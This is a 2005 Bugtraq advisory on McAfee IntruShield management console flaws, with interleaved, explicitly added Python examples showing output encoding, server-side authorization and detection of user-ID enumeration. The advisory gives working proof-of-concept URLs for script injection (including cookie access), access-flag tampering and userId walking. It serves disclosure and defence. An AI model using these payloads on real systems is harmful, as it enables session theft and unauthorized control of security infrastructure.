List: bugtraq
Subject: McAfee Intrushield IPS Abuse
From: c0ntexb () gmail ! com
Date: 2005-07-06 15:03:06
Message-ID: 20050706150306.28631.qmail () securityfocus ! com
/*
*****************************************************************************************************************
$ An open security advisory #8 - McAfee Intrushield IPS Management Console Abuse
*****************************************************************************************************************
1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
2: Bug Released: July 06 2005
3: Bug Impact Rate: Medium / High
4: Bug Scope Rate: Local / Remote
*****************************************************************************************************************
$ This advisory and/or proof of concept code must not be used for commercial gain.
*****************************************************************************************************************
McAfee IntruShield Security Management System
http://www.mcafeesecurity.com/us/products/mcafee/network_ips/category.htm
"The McAfee IntruShield Security Management System is an advanced solution for \
administering IntruShield sensor appliance deployments. The IntruShield Security \
Management System (ISM) can support both large and small network intrusion \
prevention system (IPS) deployments and can scale up to several hundred sensor \
appliances. By integrating a comprehensive set of Best-in-Class security management \
functions, the IntruShield Security Management System dramatically simplifies and \
streamlines the complexities associated with IPS configuration, policy compliance, \
and threat and response management."
I have found some security vulnerabilities in this product whereby a user who can \
only view alerts logged by remote sensors can elevate their privileges to a level \
where they can acknowledge, accept and delete alerts and access the Management \
Console. It is also possible to inject malicious HTML and JavaScript via the URLs and \
have that script run on the client's machine, allowing for account information \
hijacking.
A new version has been released to address these bugs and can be downloaded from \
their site.
*/
Issues:
1) Inject HTML
2) Inject JavaScript
3) Access privileged reports
4) Acknowledge and delete alerts
5) Gain access to Management Console
Note: for issues 1 - 4, the attacker needs a valid user account.
1) It is possible to embed HTML into the MISMS pages by placing it in URL parameters \
such as thirdMenuName. This could allow phishing attacks to be performed against a \
valid Manager account.
https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager&
domainName=%2FDemo%3A0&resourceName=%2FDemo%3A0%2FManager&resourceType=Manager&
topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=<iframe%20src="
http://www.mcafeesecurity.com/us/about/press/corporate/2005/20050411_185504.htm"%20width=800%20height=600 \
> </iframe>&severity=critical&count=1
2) It is possible to embed JavaScript into the MISMS via URL parameters such as \
resourceName and have the embedded script execute in the security context of the \
user browsing the Management System.
https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager&
domainName=Demo&resourceName=<script>alert("There could be trouble \
ahead")</script><script>alert(document.cookie) \
</script>&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=
Critical&severity=critical&count=1
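Issues 1 and 2 are the same defect: request parameters are written back into the page without output encoding. The following is an added example, not code from this advisory or from McAfee, that re-creates that pattern in a toy Python renderer and shows the hardened form beside it. The attack URL is the issue-2 URL above, trimmed; the row layout, the function names and the crude `contains_active_markup` check are assumptions made for the example.

```python
"""Reflected XSS: raw echo of a query parameter versus HTML-entity encoding.

Toy re-implementation (not IntruShield code) of a JSP page that prints
request parameters into an HTML table, shown vulnerable and hardened.
"""
from html import escape
from urllib.parse import parse_qs, urlsplit

# Constructed request: the issue-2 URL from the advisory, trimmed to the
# parameters this example renders. Host name taken from the advisory.
ATTACK_URL = (
    "https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?"
    "fullAccess=false&faultResourceName=Manager&domainName=Demo"
    "&resourceName=<script>alert(document.cookie)</script>"
    "&resourceType=Manager&severity=critical&count=1"
)

CELLS = ("resourceName", "resourceType", "severity")


def query_params(url):
    """First value of every query parameter, like JSP's request.getParameter()."""
    query = urlsplit(url).query
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def render_vulnerable(params):
    """Mimics <%= request.getParameter("resourceName") %>: raw echo into HTML."""
    cells = (params.get(k, "") for k in CELLS)
    return "<tr>" + "".join("<td>%s</td>" % c for c in cells) + "</tr>"


def render_hardened(params):
    """Same row, but every parameter is entity-encoded before it reaches the page.

    quote=True also encodes ' and ", so the value is safe inside attribute
    values as well as in element content.
    """
    cells = (escape(params.get(k, ""), quote=True) for k in CELLS)
    return "<tr>" + "".join("<td>%s</td>" % c for c in cells) + "</tr>"


def contains_active_markup(html):
    """Crude comparison helper for this example only: does the rendered
    fragment still carry a script or iframe start tag?"""
    lowered = html.lower()
    return "<script" in lowered or "<iframe" in lowered


if __name__ == "__main__":
    p = query_params(ATTACK_URL)
    print("vulnerable:", render_vulnerable(p))
    print("hardened:  ", render_hardened(p))
```

The hardened renderer does not try to filter "bad" strings; it encodes every parameter unconditionally, which is the only rule that survives attackers varying the payload. The same treatment applies to the thirdMenuName parameter used for the iframe in issue 1.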
3) It is possible to access the restricted "Generate Reports" section of the MISMS, \
through which a non-privileged user can gain important information regarding the \
configuration and set-up of the IPS devices being managed by the Service. This can be \
achieved by simply changing the fullAccessRight parameter from false to true.
https://intrushield:443/intruvert/jsp/reports/reports-column-center.jsp?monitoredDomain=%2FDemo&
selectedDomain=0&fullAccessRight=true
4) It is possible to acknowledge, de-acknowledge and delete alerts from the MISMS \
console by modifying the URLs sent to the system, simply changing the fullAccess \
parameter from false to true.
https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=true&faultResourceName=Manager&
domainName=%2FDemo%3A0&resourceName=%2FDemo%3A0%2FManager&resourceType=Manager&
topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=Critical&severity=
critical&count=1
Each change is emailed to the administrator; however, the email only says that \
"someone" made a change, so the notification does not identify which account did it.
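Issues 3 and 4 share one root cause: the client tells the server how much access it has. The following added example (not code from this advisory or from McAfee) models that with a toy acknowledge handler in two versions, one that trusts the fullAccess parameter and one that derives the right from the role bound to the server-side session and records who acted, which also addresses the anonymous "someone" e-mail. The accounts, roles, session identifiers and function names are constructed for the example; the URL is the issue-4 URL above.

```python
"""Client-supplied access flag versus server-side authorization.

Toy model (not IntruShield code) of the fullAccess / fullAccessRight
handling: the vulnerable handler lets the URL decide, the hardened one
asks the session store and names the actor in the audit trail.
"""
from urllib.parse import parse_qs, urlsplit

# Constructed accounts: a viewer may only look at alerts, a manager may act on them.
USERS = {"alice": "viewer", "bob": "manager"}
# Constructed session store: what the session cookie resolves to on the server.
SESSIONS = {"sess-alice": "alice", "sess-bob": "bob"}
PRIVILEGED_ROLES = {"manager"}

# The issue-4 URL from the advisory, with fullAccess already flipped to true.
TAMPERED_URL = (
    "https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?"
    "fullAccess=true&faultResourceName=Manager&domainName=%2FDemo%3A0"
    "&resourceName=%2FDemo%3A0%2FManager&resourceType=Manager"
    "&resourceId=-1&severity=critical&count=1"
)


class Forbidden(Exception):
    """Raised when a handler refuses the request."""


def query_params(url):
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}


def acknowledge_vulnerable(session_id, url, audit):
    """Vulnerable: the URL parameter is the only access check, and the audit
    entry does not say who acted (compare the 'someone' e-mail)."""
    params = query_params(url)
    if params.get("fullAccess") != "true":
        raise Forbidden("read-only view")
    audit.append("someone acknowledged fault %s" % params["resourceId"])
    return True


def acknowledge_hardened(session_id, url, audit):
    """Hardened: fullAccess is ignored; the right comes from the role bound to
    the server-side session, and both outcomes are logged with the account."""
    params = query_params(url)
    user = SESSIONS.get(session_id)
    if user is None:
        raise Forbidden("no valid session")
    role = USERS[user]
    if role not in PRIVILEGED_ROLES:
        audit.append("%s denied acknowledge on fault %s" % (user, params["resourceId"]))
        raise Forbidden("role %r may not acknowledge faults" % role)
    audit.append("%s acknowledged fault %s" % (user, params["resourceId"]))
    return True


def is_allowed(handler, session_id, url, audit):
    """True if the handler accepts the request, False if it raises Forbidden."""
    try:
        return handler(session_id, url, audit)
    except Forbidden:
        return False


if __name__ == "__main__":
    log = []
    print("vulnerable, viewer:", is_allowed(acknowledge_vulnerable, "sess-alice", TAMPERED_URL, log))
    print("hardened, viewer:  ", is_allowed(acknowledge_hardened, "sess-alice", TAMPERED_URL, log))
    print("hardened, manager: ", is_allowed(acknowledge_hardened, "sess-bob", TAMPERED_URL, log))
    print("\n".join(log))
```

The hardened handler never reads fullAccess at all, so there is nothing for the client to flip; the same rule applies to fullAccessRight on the reports page.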
5) By default, the user ID value is passed in the URL in the clear, meaning that it \
is trivial for an attacker to walk through user IDs until a privileged Manager account \
is found. An example of this would look similar to:
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=1&logo=intruvert.gif
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=2&logo=intruvert.gif
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=3&logo=intruvert.gif
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=4&logo=intruvert.gif
This process can be continued until a valid user ID has been found with privileges \
to access the configure screen.
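The sequential disp.jsp?userId=N requests above leave an obvious trace in the web server's access log. The following added example (not from the advisory or the product) is a small detection script that flags any client requesting several distinct userId values within a short window. The log lines are constructed in Apache combined-like format; the client addresses, timestamps, byte counts and the threshold and window values are assumptions made for the example.

```python
"""Detecting user-ID enumeration against disp.jsp in access logs.

Added SOC-side check (not IntruShield code): flag a client that walks
through many distinct userId values in a short time.
"""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Constructed sample log: 10.0.0.5 walks userId 1..5 in seconds, then one
# more request much later; 10.0.0.9 is an ordinary user.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Jul/2005:15:03:06 +0000] "GET /intruvert/jsp/menu/disp.jsp?userId=1&logo=intruvert.gif HTTP/1.1" 200 5120
10.0.0.5 - - [06/Jul/2005:15:03:07 +0000] "GET /intruvert/jsp/menu/disp.jsp?userId=2&logo=intruvert.gif HTTP/1.1" 200 5120
10.0.0.9 - - [06/Jul/2005:15:03:08 +0000] "GET /intruvert/jsp/menu/disp.jsp?userId=7&logo=intruvert.gif HTTP/1.1" 200 5120
10.0.0.5 - - [06/Jul/2005:15:03:09 +0000] "GET /intruvert/jsp/menu/disp.jsp?userId=3&logo=intruvert.gif HTTP/1.1" 200 5120
10.0.0.9 - - [06/Jul/2005:15:03:10 +0000] "GET /intruvert/jsp/reports/reports-column-center.jsp?monitoredDomain=%2FDemo HTTP/1.1" 200 2210
10.0.0.5 - - [06/Jul/2005:15:03:11 +0000] "GET /intruvert/jsp/menu/disp.jsp?userId=4&logo=intruvert.gif HTTP/1.1" 200 5120
10.0.0.5 - - [06/Jul/2005:15:03:12 +0000] "GET /intruvert/jsp/menu/disp.jsp?userId=5&logo=intruvert.gif HTTP/1.1" 200 5120
10.0.0.5 - - [06/Jul/2005:16:40:00 +0000] "GET /intruvert/jsp/menu/disp.jsp?userId=9&logo=intruvert.gif HTTP/1.1" 200 5120
"""

# client, ident, authuser, [timestamp], "method target protocol", status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
TARGET_PATH = "/intruvert/jsp/menu/disp.jsp"


def parse_line(line):
    """Return (client, time, user_id) for a disp.jsp request carrying userId,
    or None for any other line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, stamp, _method, target, _status = m.groups()
    parts = urlsplit(target)
    if parts.path != TARGET_PATH:
        return None
    uid = parse_qs(parts.query).get("userId")
    if not uid:
        return None
    when = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")
    return client, when, uid[0]


def find_enumeration(lines, threshold=4, window_seconds=60):
    """Clients that request at least `threshold` distinct userId values inside
    any span of `window_seconds`. Returns {client: sorted ids in that span}."""
    by_client = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev:
            by_client[ev[0]].append(ev[1:])
    flagged = {}
    for client, events in by_client.items():
        events.sort()  # by timestamp
        for i, (start, _) in enumerate(events):
            ids = set()
            for when, uid in events[i:]:
                if (when - start).total_seconds() > window_seconds:
                    break
                ids.add(uid)
            if len(ids) >= threshold:
                flagged[client] = sorted(ids)
                break
    return flagged


if __name__ == "__main__":
    for client, ids in find_enumeration(SAMPLE_LOG.splitlines()).items():
        print("%s walked userId values %s" % (client, ", ".join(ids)))
```

Counting distinct IDs rather than raw requests keeps a user who reloads their own page from tripping the rule, and the time window keeps a long-lived legitimate session from accumulating hits. On a real deployment the detection complements the fix rather than replacing it: userId should never be accepted from the client in the first place.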
Since JavaScript can be run in the browsers of clients accessing the device, it \
would be possible to redraw the page with IFRAMEs and recreate the user login page \
to snoop usernames and passwords.